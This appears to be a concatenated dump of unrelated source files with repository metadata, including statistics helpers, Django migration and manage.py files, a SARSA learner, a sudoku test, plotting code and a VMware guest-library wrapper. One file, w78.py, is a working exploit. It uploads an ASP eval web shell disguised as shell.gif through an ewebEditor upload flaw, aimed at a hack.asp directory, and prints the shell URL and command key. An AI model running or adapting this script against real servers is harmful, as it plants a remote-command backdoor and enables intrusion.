    cent_tend -- the calculated measure of central tendency
    """
    # `st` was never imported at module level, so the 'mode' branch raised
    # NameError; bind scipy.stats locally to fix that.
    import scipy.stats as st
    measures = {'mean': np.mean, 'median': np.median, 'mode': st.mode}
    return measures[type_](df[col])
def ranger(df):
    """Return the range of the values (maximum minus minimum)."""
    highest = max(df)
    lowest = min(df)
    return highest - lowest
def mad(df):
    """Return the mean absolute deviation from the mean."""
    deviations = np.absolute(df - np.mean(df))
    return np.mean(deviations)
def cv(df):
    """Return the coefficient of variation: population std over mean, as a percentage."""
    ratio = np.std(df) / np.mean(df)
    return ratio * 100
def iqr(df):
    """Return the interquartile range (75th minus 25th percentile)."""
    q3 = np.percentile(df, 75)
    q1 = np.percentile(df, 25)
    return q3 - q1
def measure_of_dispersion(type_, df, col):
    """Calculate the measure of dispersion.

    Keyword arguments:
    type_ -- one of 'Standard Deviation', 'Variance', 'Range', 'Covariance',
             'MAD', 'CV', 'IQR'
    df -- the dataframe
    col -- the column(s) to use; a list of 2 columns when computing covariance

    Returns:
    disp -- the calculated measure of dispersion
    """
    # The original placed this docstring after the body, where it never
    # became __doc__. Dispatch table relies on the sibling helpers
    # ranger/mad/cv/iqr defined above in this module.
    dispatch = {'Standard Deviation': np.std, 'Variance': np.var,
                'Range': ranger, 'Covariance': np.cov,
                'MAD': mad, 'CV': cv, 'IQR': iqr}
    return dispatch[type_](df[col])
def calculate_correlation(type_, df, col1, col2):
    """Calculate the defined correlation coefficient.

    Keyword arguments:
    type_ -- 'Pearson' or 'Spearman'
    df -- the dataframe
    col1 -- first column
    col2 -- second column

    Returns:
    corr -- the calculated correlation coefficient, in [-1, 1]
    """
    if type_ == 'Pearson':
        # df.cov() is the *sample* covariance (ddof=1), so the standard
        # deviations must also use ddof=1. The original divided by the
        # population std (ddof=0), inflating the result by n/(n-1) and
        # producing "correlations" greater than 1.
        return (df.cov().loc[col1, col2] /
                (np.std(df[col1], ddof=1) * np.std(df[col2], ddof=1)))
    elif type_ == 'Spearman':
        ranks = df[[col1, col2]].rank(axis=0)
        d_square = ((ranks[col1] - ranks[col2]) ** 2).sum()
        n = len(df[col1])
        return 1 - (6 * d_square) / (n * (n ** 2 - 1))
def calculate_probability_discrete(data, event):
    """Calculate the probability of an event from a discrete distribution.

    Keyword arguments:
    data -- dataframe containing the discrete variable
    event -- column whose rarer (crisis) outcome probability is wanted

    Returns:
    prob -- probability of the less frequent of the two outcomes
    """
    # Use the `data` argument — the original read the module-level global
    # `df`, which left the parameter dead and the function untestable.
    counts = data[event].value_counts()
    # value_counts() sorts descending, so iloc[1] is the rarer outcome
    # (the crisis case in this dataset).
    return counts.iloc[1] / (counts.iloc[0] + counts.iloc[1])
def event_independence_check(prob_event1, prob_event2, prob_event1_event2):
    """Check whether two events are independent.

    Compares P(event1 | event2) = P(event1, event2) / P(event2) against
    P(event1) using exact float equality (as the callers in this script
    expect). NOTE: exact equality is fragile for computed probabilities;
    math.isclose would be more robust if callers can tolerate it.

    Keyword arguments:
    prob_event1 -- probability of event1
    prob_event2 -- probability of event2
    prob_event1_event2 -- joint probability of event1 and event2

    Returns:
    'Independent' when P(event1|event2) == P(event1), else 'Dependent'
    """
    # The original placed its docstring after the body (dead code) and used
    # a redundant `elif pa_b != prob_event1` where a plain else suffices.
    pa_given_b = prob_event1_event2 / prob_event2
    if pa_given_b == prob_event1:
        return 'Independent'
    return 'Dependent'
# Checking if banking crisis is independent
# Joint-occurrence subsets: banking crisis together with each other crisis type.
b_s = df[(df['systemic_crisis'] == 1) & (df['banking_crisis'] == 'crisis')]
b_i = df[(df['inflation_crises'] == 1) & (df['banking_crisis'] == 'crisis')]
b_c = df[(df['currency_crises'] == 1) & (df['banking_crisis'] == 'crisis')]
# Joint probabilities as row-count fractions of the whole dataset.
p_bank_system = b_s['case'].count()/df['case'].count()
p_bank_currency = b_c['case'].count()/df['case'].count()
p_bank_inflation = b_i['case'].count()/df['case'].count()
# Marginal probabilities of each crisis type.
p_bank = calculate_probability_discrete(df,'banking_crisis')
p_system = calculate_probability_discrete(df,'systemic_crisis')
p_inflation = calculate_probability_discrete(df,'inflation_crises')
p_currency = calculate_probability_discrete(df,'currency_crises')
# NOTE(review): the three checks below discard their 'Independent'/'Dependent'
# return values; nothing is printed or stored.
# System
event_independence_check(p_bank, p_system, p_bank_system)
# Currency
event_independence_check(p_bank, p_currency, p_bank_currency)
# Inflation
event_independence_check(p_bank, p_inflation, p_bank_inflation)
# Bank given system
# Conditional probabilities P(banking crisis | other crisis).
p_b_s = p_bank_system/p_system
p_b_c = p_bank_currency/p_currency
p_b_i = p_bank_inflation/p_inflation
prob_ = [p_b_s,p_b_c,p_b_i]
def bayes_theorem(df, col1, event1, col2, event2):
    """Calculate the conditional probability P(event1 | event2).

    Uses the definition of conditional probability:
    P(event1 | event2) = P(event1 and event2) / P(event2).

    Keyword arguments:
    df -- the dataframe
    col1 -- the first column where the first event is recorded
    event1 -- event to define the first condition
    col2 -- the second column where the second event is recorded
    event2 -- event to define the second condition

    Returns:
    prob -- probability of event1 given event2 has already occurred

    Fixes: the original function body contained only this docstring and
    always returned None.  NOTE: if event2 never occurs in df, the result
    is undefined (0/0 -> NaN for numpy floats).
    """
    # Boolean-mask means are count/total, so the totals cancel in the ratio.
    prob_event2 = (df[col2] == event2).mean()
    prob_joint = ((df[col1] == event1) & (df[col2] == event2)).mean()
    return prob_joint / prob_event2
| [
"[email protected]"
]
| |
248d8b61cb8796e0a111657d391f2c4e4015226f | bb80ddf8324408705a30e8644a2d693252cf54e9 | /products/migrations/0001_initial.py | d675a60a138b0ee81ea285f6556589b60a0cadad | []
| no_license | Code-Institute-Submissions/full_stack_stream_four_happy_box | 483d4286b26825cf4428600b677147fd63201ff0 | 5c2fd5803bc8164d4028702b3859f5eb891d70e3 | refs/heads/master | 2020-03-27T19:57:01.538937 | 2018-09-01T18:37:26 | 2018-09-01T18:37:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,339 | py | # Generated by Django 2.0.7 on 2018-07-11 12:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Initial schema for the products app: Category, Image and Product models
    # plus the Image->Product FK and a (id, slug) composite index.
    # NOTE: auto-generated by Django; keep operations stable once applied.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(db_index=True, default='', max_length=150)),
                ('slug', models.SlugField(max_length=150, unique=True)),
            ],
            options={
                'verbose_name': 'category',
                'ordering': ('name',),
                'verbose_name_plural': 'categories',
            },
        ),
        migrations.CreateModel(
            name='Image',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=20)),
                ('image', models.ImageField(blank=True, upload_to='images')),
            ],
        ),
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(db_index=True, default='', max_length=254)),
                ('slug', models.SlugField(max_length=100)),
                ('description', models.TextField(blank=True)),
                ('brand', models.CharField(default='', max_length=50)),
                ('price', models.DecimalField(decimal_places=2, max_digits=6)),
                ('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='products', to='products.Category')),
            ],
            options={
                'ordering': ('name',),
            },
        ),
        # FK added after both models exist; every Image belongs to a Product.
        migrations.AddField(
            model_name='image',
            name='product',
            field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='product_images', to='products.Product'),
        ),
        migrations.AlterIndexTogether(
            name='product',
            index_together={('id', 'slug')},
        ),
    ]
| [
"[email protected]"
]
| |
d591cfa31e9c148bfac88be4aefee2acdd0a8266 | fc39e431bcf4ead647b3c4a2b8fb8dc772928852 | /Indoor_Webapp_B/Indoor_Webapp_B/Indoor_Webapp_B/manage.py | eec6c95947e4ab94a6f3118584215b324c299e0c | [
"BSD-3-Clause"
]
| permissive | DavidTF85/IndooeAir-Webapp-B | c129414be094c39a00fa397e4eed16dc39f7bb14 | 579f7593116d743e566e16219370c98e2937844b | refs/heads/master | 2020-09-12T08:32:24.099793 | 2019-11-18T05:24:55 | 2019-11-18T05:24:55 | 222,369,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 656 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run Django's command-line utility with this project's settings."""
    # Fall back to the project settings module unless the caller already set one.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Indoor_Webapp_B.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Re-raise with a friendlier hint; `from exc` keeps the original cause.
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| [
"[email protected]"
]
| |
5277a28915df23b9142e32432af44be09e017f3a | 3add20877ed753be70402e97f40ad3737a265515 | /lecture_advanced/Lecture1.HotFollowupQuestions/386. Longest Substring with At Most K Distinct Characters.py | 93cfa12ae7c8ad41d8048f0341ca09073b900826 | []
| no_license | zhuohuwu0603/interview-algothims | 85f48b7de2e87129fd353528b114cb80c8877d7b | 338d3bc2f2916c5c4936767b07b2fd22b4121049 | refs/heads/master | 2022-01-08T11:27:16.441367 | 2019-06-12T05:49:25 | 2019-06-12T05:49:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,347 | py | '''
Given a string s, find the length of the longest substring T that contains at most k distinct characters.
Example
For example, Given s = "eceba", k = 3,
T is "eceb" which its length is 4.
Challenge
O(n), n is the size of the string s.
'''
import collections
class Solution:
    """
    @param s: A string
    @param k: An integer
    @return: An integer
    """

    def lengthOfLongestSubstringKDistinct(self, s, k):
        """Return the length of the longest substring of `s` with at most
        `k` distinct characters (0 for empty input or k <= 0).

        O(n) sliding window: extend the right edge one character at a time
        and shrink from the left whenever more than k distinct characters
        are inside the window.

        Bug fixed: the original re-incremented s[end] on every blocked outer
        iteration without ever undoing the increments, leaving "ghost"
        characters in the count map; e.g. ("abcbdddddd", 2) returned 6
        instead of the correct 7 ("bdddddd").
        """
        if not s or k <= 0:
            return 0
        counts = collections.defaultdict(int)  # char -> occurrences in window
        best = 0
        left = 0
        for right in range(len(s)):
            counts[s[right]] += 1
            # Shrink until the window holds at most k distinct characters.
            while len(counts) > k:
                counts[s[left]] -= 1
                if counts[s[left]] == 0:
                    del counts[s[left]]
                left += 1
            best = max(best, right - left + 1)
        return best
'''
算法武器:前向型移窗口类动双指针
本题的题型是滑动窗口类型,使用模板写法:
定义start,end,ans三个变量
start做外层for循环
end做内层while循环
while条件为end的边界和题目的约束
更新答案部分必须要加条件判断
更新答案必须在更新end变量之前
对于hash表的处理都是放在while循环内进行,一般不需要在for层做任何特别处理
注意:
本题求解的是上界答案问题
我们的答案直接在内层while循环中更新,而不需要当while退出之后再根据条件更新答案,因为while循环的条件是end在边界内,同时满足题目条件,这意味着我们找到一组有效解,我们需要和全局解比较,不断更新上界的解
在更新答案的时候还是要确定一下条件,再更新
if len(hashmap) <= k:
ans = max(ans, end - start + 1)
其他类求下界问题,比如sum类求下界问题,我们就需要在跳出while循环单独更新。因为while循环进行的条件是end在边界内,同时不满足条件的时候,我们继续扩大窗口边界,移动end指针。当循环跳出时,我们可能找到了一组有效解,所以我们还需要检查条件是否满足,满足时才将其和全局答案比较、更新
''' | [
"[email protected]"
]
| |
019278eb3581d9502a8dea534db2529d1d65b1bd | b52547e856f3dee82a332105f3b2553133c7e560 | /ModelFreeRLPolicyLearning/policy_learning_sarsa.py | 2c874536de7fef43e8b732237fb216c72c461639 | []
| no_license | yuhsh24/RLlearning | 0d3410b9254527e74dc932ccf502cd8972d0bb23 | 2a49ac9ea877cae27c0ce513b795c10a2266b166 | refs/heads/master | 2021-01-19T05:22:23.013144 | 2016-07-21T09:48:49 | 2016-07-21T09:48:49 | 63,664,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,224 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import grid_mdp
import random
random.seed(0)
import matplotlib.pyplot as plt
grid = grid_mdp.Grid_Mdp()
states = grid.getStates()
actions = grid.getActions()
gamma = grid.getGamma()
#epsilon greedy policy#
def epsilon_greedy(qfunc, state, epsilon):
    """Sample an action for `state` under the epsilon-greedy policy.

    The greedy action receives probability (1 - epsilon) + epsilon/|A|;
    every other action receives epsilon/|A|.  Relies on the module-level
    `actions` list and `random`; Q-values are keyed "state_action".
    """
    n = len(actions)
    # Greedy step: locate the index of the highest-valued action.
    best_idx = 0
    best_q = qfunc["%d_%s" % (state, actions[0])]
    for idx in range(n):
        q = qfunc["%d_%s" % (state, actions[idx])]
        if best_q < q:
            best_q = q
            best_idx = idx
    # Build the action distribution (same accumulation order as before).
    probs = [0.0 for _ in range(n)]
    probs[best_idx] += 1 - epsilon
    for idx in range(n):
        probs[idx] += epsilon / n
    # Inverse-CDF sampling with a single random draw.
    threshold = random.random()
    cumulative = 0.0
    for idx in range(n):
        cumulative += probs[idx]
        if cumulative >= threshold:
            return actions[idx]
    # Guard against floating-point shortfall in the cumulative sum.
    return actions[n - 1]
best = dict()
def read_best():
    """Load the reference Q-function from the 'best_qfunc' file.

    Each non-empty line is "state_action:value"; entries are stored in the
    module-level `best` dict with float values.

    Fix: the original opened the file without ever closing it (leaked
    handle); `with` guarantees the file is closed.
    """
    with open("best_qfunc") as f:
        for line in f:
            line = line.strip()
            if len(line) == 0:
                continue
            element = line.split(":")
            best[element[0]] = float(element[1])
def compute_error(qfunc):
    """Sum of squared differences between `qfunc` and the reference `best`
    table, over the keys present in `qfunc`."""
    diffs = (qfunc[key] - best[key] for key in qfunc)
    return sum(d * d for d in diffs)
def sarsa(num_iter1, alpha, epsilon):
    """On-policy SARSA on the module-level grid MDP.

    num_iter1 -- number of training episodes
    alpha     -- learning rate
    epsilon   -- exploration rate for the epsilon-greedy behaviour policy

    Plots the squared error against the reference Q-table (`best`, loaded by
    read_best) per episode, then returns the learned Q-function as a dict
    keyed "state_action".  Depends on module globals: grid, states, actions,
    gamma, random (seeded at import for reproducibility), plt.
    """
    x = []
    y = []
    # Initialise Q(s, a) = 0 for every state/action pair.
    qfunc = dict()
    for s in states:
        for a in actions:
            key = "%d_%s"%(s, a)
            qfunc[key] = 0.0
    for iter1 in xrange(num_iter1):
        # Record the current error before this episode's updates.
        x.append(iter1)
        y.append(compute_error(qfunc))
        # Start each episode from a uniformly random state and action.
        s = states[int(random.random() * len(states))]
        a = actions[int(random.random() * len(actions))]
        t = False
        count = 0
        # Roll out until a terminal transition or 100 steps.
        while False == t and count < 100:
            key = "%d_%s"%(s,a)
            t, s1, r = grid.transform(s,a)
            # SARSA is on-policy: the successor action a1 is drawn from the
            # same epsilon-greedy policy and used in the TD target.
            a1 = epsilon_greedy(qfunc, s1, epsilon)
            key1 = "%d_%s"%(s1,a1)
            qfunc[key] = qfunc[key] + alpha * (r + gamma * qfunc[key1] - qfunc[key])
            s = s1
            a = a1
            count += 1
    plt.plot(x,y,"--",label="sarsa alpha=%2.1f epsilon=%2.1f"%(alpha,epsilon))
    plt.show(True)
    return qfunc;
if __name__ == "__main__":
    # Load the reference Q-table, then train and plot the learning curve.
    read_best()
    sarsa(1000, 0.2, 0.2)
| [
"[email protected]"
]
| |
b235e47ceab2dde9ba3dcadac64258bc818f6667 | 0aa0c38985c11331b20e1d9bdeabfdcaf5dea90f | /ex10.py | c77558f62b5bebe437bd461e03d98e8d5357ebd7 | []
| no_license | dongul11/lpthw | 5dd92278a35166e2b465aafd3e171ebc60cd4340 | 35c973e65820601b6231d001d100c06f02558adc | refs/heads/master | 2021-09-22T10:06:14.775565 | 2018-09-07T17:28:43 | 2018-09-07T17:28:43 | 114,300,461 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | tabby_cat = "\tI'm tabbed in."
persian_cat = "I'm split\non a line."
backslash_cat = "I'm \\ a \\ cat."
fat_cat = '''
I'll do a list:
\t* Cat food
\t* Fishies
\t* Catnip\n\t* Grass
'''
print (tabby_cat)
print (persian_cat)
print(backslash_cat)
print(fat_cat)
| [
"[email protected]"
]
| |
d7aac9af796fa2c15a1d847133e699fd19779ed9 | 63dc51b514faea7966d529440df80c4a6eab34b1 | /src/test/TestLibSudoku.py | 964c3f328a77ae5d348cff9cdca232b81d916c50 | []
| no_license | caviedes93/PySudoku | af1368dac2f0c374552710cc75132f6799b049f1 | d67e110684526fe188436884ec51ecc89ad6c388 | refs/heads/master | 2020-12-25T10:59:20.442887 | 2013-07-27T22:58:19 | 2013-07-27T22:58:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | '''
Created on 26/07/2013
@author: dominik
'''
import unittest
from lib.libSudoku import get_new_board, is_board_valid
class Test(unittest.TestCase):
    """Sanity checks for board generation/validation in lib.libSudoku."""
    def testBoardCreationAndValidation(self):
        # Freshly generated boards must always validate.
        for _ in range(1, 100):
            board = get_new_board()
            self.assertTrue(is_board_valid(board), "newly created board is not valid")
        # Duplicating a value inside the top-left 3x3 group breaks validity.
        board = get_new_board()
        board[0][0] = board[2][2]
        self.assertFalse(is_board_valid(board), "invalid board deemed to be valid - group")
        # Duplicating a value within row 0 breaks validity.
        board = get_new_board()
        board[0][8] = board[0][0]
        self.assertFalse(is_board_valid(board), "invalid board deemd te be valid - row")
        # Duplicating a value within column 8 breaks validity.
        board = get_new_board()
        board[8][8] = board[0][8]
        self.assertFalse(is_board_valid(board), "invalid board deemd te be valid - col")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() | [
"[email protected]"
]
| |
5d89b263f903257da771dc932d0f1474a6cc84f2 | ca16db75d99903e135589da7c737dbe88a12bb4b | /Scripts/plottingCodes/DescritiveData.py | ea9999121b77355c9c4285d8c8a3b3b0f5df42e8 | []
| no_license | iphyer/CS760_Twitter_Demographics | 7b413ae3753bb7487a8f89b8ba09e9876fabea56 | 3354fde862dbbab8965c0dd709a02643849e0668 | refs/heads/master | 2021-09-13T06:42:48.524495 | 2018-04-26T02:42:16 | 2018-04-26T02:42:16 | 111,339,780 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,365 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 5 20:44:28 2017
@author: mingrenshen
"""
# import libarary needed
import pandas as pd # data processing
import matplotlib.pyplot as plt
######################################################
# read in data
######################################################
## user data
allUsrFeatureData = pd.read_csv("../data/louis_users_all_features_label_1205_updated.csv")
# plotting Data
#grouped = allUsrFeatureData['freqWeekDay'].groupby('gender')
print allUsrFeatureData['gender'].value_counts()
# Font for figure
font_axis_publish = {
'color': 'black',
'weight': 'normal',
'size': 15,
}
#ax = allUsrFeatureData.boxplot(column='freqWeekDay',by='gender')
#plt.ylabel('RMSF ($\AA$)', fontdict=font_axis_publish)
#plt.xlim(0,1000)
#plt.set_title("")
col_list = list(allUsrFeatureData.columns.values)
starting_index = col_list.index("gender")
for i in range(len(col_list)):
if i > starting_index:
curr_feature = col_list[i]
allUsrFeatureData.boxplot(column=curr_feature,by='gender')
plt.title(curr_feature, fontdict=font_axis_publish)
plt.suptitle("")
plt.xlabel('gender', fontdict=font_axis_publish)
#plt.show()
str_tmp = curr_feature + '.png'
plt.savefig(str_tmp)
plt.close() | [
"[email protected]"
]
| |
d5cdfc7ff6bc5ac45f96cbed28e972545aea0552 | a612b1ee8e604dc5f98f009b2b88a82b7c63bb22 | /hestia/wsgi.py | cfb6467a8fd3d7271dcebde7d32747472c4de2a0 | [
"MIT"
]
| permissive | GDGVIT/hestia-report | e09a7bf8d7a5b1317495821c660291af3263211f | 5fedd89b9a8fbc32e4f81a7529f10a706b01fe6c | refs/heads/master | 2021-04-24T02:43:09.157623 | 2020-07-18T14:44:26 | 2020-07-18T14:44:26 | 250,063,038 | 0 | 3 | MIT | 2021-02-20T02:32:06 | 2020-03-25T18:48:01 | Python | UTF-8 | Python | false | false | 389 | py | """
WSGI config for hestia project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings unless the environment already set them.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'hestia.settings')
# Module-level WSGI callable that servers (gunicorn, mod_wsgi) look up.
application = get_wsgi_application()
| [
"[email protected]"
]
| |
174aec0b7bfde27c24cc6abccfd345e1ef6dced6 | 48ac4b8138b490a876a2530dad1bca29f1823de5 | /first_tests/colecciones.py | 5c290b80eb83d6767835a388a0a42d158bb60b7a | [
"MIT"
]
| permissive | Gorwast/python-tests | dbb7222d6a3ccdc2de0d5ad90156f02a4ba69607 | 342605fdfa50d05c645e12c15b4db24d3f7cb7f0 | refs/heads/master | 2023-01-08T20:24:03.893124 | 2020-11-18T21:16:18 | 2020-11-18T21:16:18 | 272,347,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | #Collections: List
l1 = [22, True, "String", [4, 5]]
l2 = [15, 30, 45, 60]
var1 = l1[0]
print("List: ")
print(var1)
print(l2[3])
print(l2[0:2])
for elemento in l2:
print(elemento)
###Collections: Tupla
t1 = (10, False, 3.2, (2, 3))
print(type(t1))
print(type(l1))
var2 = t1[1]
print("Tuple: ")
print(t1[2])
print(var2)
###Colecciones: Diccionario
d1 = {'Name': 'Luis', 'Age': 21, 'Theme': 'Development'}
var3 = d1{'Age'}
print('Dictionary: ')
print()
| [
"[email protected]"
]
| |
0dfb49a2afd192c3a3d067f55be0b096846c7d5a | 8b8af2d3a8c04ab75d0b331771fa16e0bfe96301 | /storage/csv_dictwrite.py | 87f5899f076e23b15d8bfb31811c34902727a421 | []
| no_license | RyukerLiu/introducing-python | 6a44b6560e0f82b1886d3359cd0b4bc21e486430 | f902a1fa7b31cd6c1978d176fec3b1bf6bb23718 | refs/heads/master | 2020-05-03T01:25:10.869550 | 2019-04-02T07:20:20 | 2019-04-02T07:20:20 | 178,336,744 | 0 | 0 | null | 2019-03-29T05:13:19 | 2019-03-29T05:13:19 | null | UTF-8 | Python | false | false | 254 | py | import csv
villains = [{'first': 'Doctor', 'last': 'No'} , {'first': 'Rosa', 'last' : 'Klebb'}]
with open('villians', 'wt', newline='') as fout:
csvout = csv.DictWriter(fout, ['first', 'last'])
csvout.writeheader()
csvout.writerows(villains)
| [
"[email protected]"
]
| |
c3ff962e9bc2259450ab129275683d0d23c67865 | 2411ee54802c71aa40895e827171f07289194990 | /w78.py | 798cb1329435e69c608c816bdb9724c582d3101e | []
| no_license | GoodJob567/eweb-exp | aeaf14a715279f07307c6761110cdd2dcdff946d | 26911dbf26563684a40646220788be04e9532fab | refs/heads/master | 2023-02-16T03:28:46.829739 | 2021-01-14T11:30:21 | 2021-01-14T11:30:21 | 329,593,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 533 | py | import requests
key="cmd"
requests.get("http://172.16.12.2/admin/ewebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=hack.asp")
# 要上传的文件
f = open('shell.gif', 'w')
f.write('<%eval request("'+key+'")%>')
f.close()
f={'uploadfile':open('shell.gif','rb')}
r=requests.post("http://172.16.12.2/admin/ewebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=hack.asp",files=f).content
i=r.find(b"d('")
r=r[i+3:]
i=r.find(b"'")
print("URL: http://172.16.12.2"+r[:i].decode())
print("key is: "+key) | [
"[email protected]"
]
| |
edcede7c435a63d0e75eb252da4cc153f45acc02 | 68f04671ed3e2aeb2032a4fdecbede89cf9e1832 | /ridge.py | de8b2783a7c235dd6d36114b04259136a70ee35a | []
| no_license | sushuang9210/machine_learning_algorithms | 306c3fa086326cefd2c463f5d16cbe9829abc447 | 4aac5c664816612b1d4f078f5b7a548474bb9534 | refs/heads/master | 2020-03-18T17:07:35.444194 | 2018-06-11T04:18:25 | 2018-06-11T04:18:25 | 135,007,939 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 835 | py | import numpy as np
from sklearn.linear_model import RidgeClassifier
class Ridge:
    """Binary classification wrapper around sklearn's RidgeClassifier.

    Two feature arrays are merged into one shuffled training set whose last
    column is the class label (1 for data_1, 0 for data_2).
    """
    def __init__(self, data_1, data_2, model_parameters):
        # model_parameters: [tolerance, solver name] for RidgeClassifier.
        self.clf = RidgeClassifier(tol=float(model_parameters[0]), solver=model_parameters[1])
        # NOTE: labels are written into the callers' arrays in place
        # (kept for behavioural compatibility with the original).
        data_1[:, -1] = np.ones(data_1.shape[0])
        data_2[:, -1] = np.zeros(data_2.shape[0])
        self.train_set = np.concatenate((data_1, data_2), axis=0)
        np.random.shuffle(self.train_set)
        # Features are every column but the last; labels are the last column.
        self.X_train = self.train_set[:, 0:-1]
        self.y_train = self.train_set[:, -1]
    def ridge_train(self):
        """Fit the classifier on the prepared training set."""
        self.clf.fit(self.X_train, self.y_train)
    def ridge_predict(self, test):
        """Return (class-1 predictions, their complement) for `test`."""
        positive = self.clf.predict(test)
        negative = np.ones(test.shape[0]) - positive
        return positive, negative
| [
"[email protected]"
]
| |
8484b482275e2ea081b24eac4c59213d8ff39e93 | 0889098368a18cc6ecfa442cfe86ed10a5ba32d6 | /myblog/admin.py | 300fd70c10c84a714d630170dbbed01102456364 | []
| no_license | waaaaargh/myblog | 9932ee5606497851f9ad99b4f1da1a9a604495f6 | 95cd823ea70bdc6e835f63590dfa36da5c4e6d25 | refs/heads/master | 2016-09-06T09:15:29.069543 | 2015-03-24T04:16:32 | 2015-03-24T04:16:32 | 9,065,605 | 0 | 0 | null | 2013-10-30T12:22:26 | 2013-03-27T23:02:40 | Python | UTF-8 | Python | false | false | 662 | py | from os.path import join
from myblog import app, model, db, base_path
from flask.ext.admin import Admin
from flask.ext.admin.contrib.sqla import ModelView
from flask.ext.admin.contrib.fileadmin import FileAdmin
admin = Admin(app, name="MyBlog")
class PostView(ModelView):
form_excluded_columns = ['date', 'comments']
admin.add_view(PostView(model.post, db.session))
class CategoryView(ModelView):
form_excluded_columns = ['posts']
admin.add_view(CategoryView(model.category, db.session))
class CommentView(ModelView):
pass
admin.add_view(CommentView(model.comment, db.session))
admin.add_view(FileAdmin(join(base_path, "static"), "/static/"))
| [
"[email protected]"
]
| |
8c5ffaaa66db4fcbb98cfd663e36037edaa8163a | abaa806550f6e6e7bcdf71b9ec23e09a85fe14fd | /data/global-configuration/packs/vmware/collectors/vmguestlib.py | eb9e2dabd67d95667afa30dc59ee76accdf5f3c7 | [
"MIT"
]
| permissive | naparuba/opsbro | 02809ddfe22964cd5983c60c1325c965e8b02adf | 98618a002cd47250d21e7b877a24448fc95fec80 | refs/heads/master | 2023-04-16T08:29:31.143781 | 2019-05-15T12:56:11 | 2019-05-15T12:56:11 | 31,333,676 | 34 | 7 | null | null | null | null | UTF-8 | Python | false | false | 22,971 | py | ### This program is free software; you can redistribute it and/or
### modify it under the terms of the GNU General Public License
### as published by the Free Software Foundation; either version 2
### of the License, or (at your option) any later version.
###
### This program is distributed in the hope that it will be useful,
### but WITHOUT ANY WARRANTY; without even the implied warranty of
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
### GNU General Public License for more details.
###
### You should have received a copy of the GNU General Public License
### along with this program; if not, write to the Free Software
### Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
### Copyright 2013-2014 Dag Wieers <[email protected]>
from ctypes import *
from ctypes.util import find_library
__author__ = 'Dag Wieers <[email protected]>'
__version__ = '0.1.2'
__version_info__ = tuple([int(d) for d in __version__.split('.')])
__license__ = 'GNU General Public License (GPL)'
# TODO: Implement support for Windows and MacOSX, improve Linux support ?
# Locate the VMware Guest SDK shared library: newer VMware Tools ship it as
# "vmGuestLib", some older releases as "guestlib".
# NOTE(review): this module targets Python 2 (see the py2 `raise` syntax below).
if find_library('vmGuestLib'):
    vmGuestLib = CDLL(find_library('vmGuestLib'))
elif find_library('guestlib'):
    vmGuestLib = CDLL(find_library('guestlib'))
# elif os.path.exists('/usr/lib/vmware-tools/lib/libvmGuestLib.so/libvmGuestLib.so'):
#    vmGuestLib = CDLL('/usr/lib/vmware-tools/lib/libvmGuestLib.so/libvmGuestLib.so')
# elif os.path.exists('%PROGRAMFILES%\\VMware\\VMware Tools\\Guest SDK\\vmStatsProvider\win32\\vmGuestLib.dll'):
#    vmGuestLib = CDLL('%PROGRAMFILES%\\VMware\\VMware Tools\\Guest SDK\\vmStatsProvider\win32\\vmGuestLib.dll')
else:
    raise Exception, 'ERROR: Cannot find vmGuestLib library in LD_LIBRARY_PATH'
# vSphere Guest API status codes (mirror of VMGuestLibError in vmGuestLib.h).
VMGUESTLIB_ERROR_SUCCESS = 0
VMGUESTLIB_ERROR_OTHER = 1
VMGUESTLIB_ERROR_NOT_RUNNING_IN_VM = 2
VMGUESTLIB_ERROR_NOT_ENABLED = 3
VMGUESTLIB_ERROR_NOT_AVAILABLE = 4
VMGUESTLIB_ERROR_NO_INFO = 5
VMGUESTLIB_ERROR_MEMORY = 6
VMGUESTLIB_ERROR_BUFFER_TOO_SMALL = 7
VMGUESTLIB_ERROR_INVALID_HANDLE = 8
VMGUESTLIB_ERROR_INVALID_ARG = 9
VMGUESTLIB_ERROR_UNSUPPORTED_VERSION = 10
# Symbolic names, indexable by the numeric status code above.
VMErrors = (
    'VMGUESTLIB_ERROR_SUCCESS',
    'VMGUESTLIB_ERROR_OTHER',
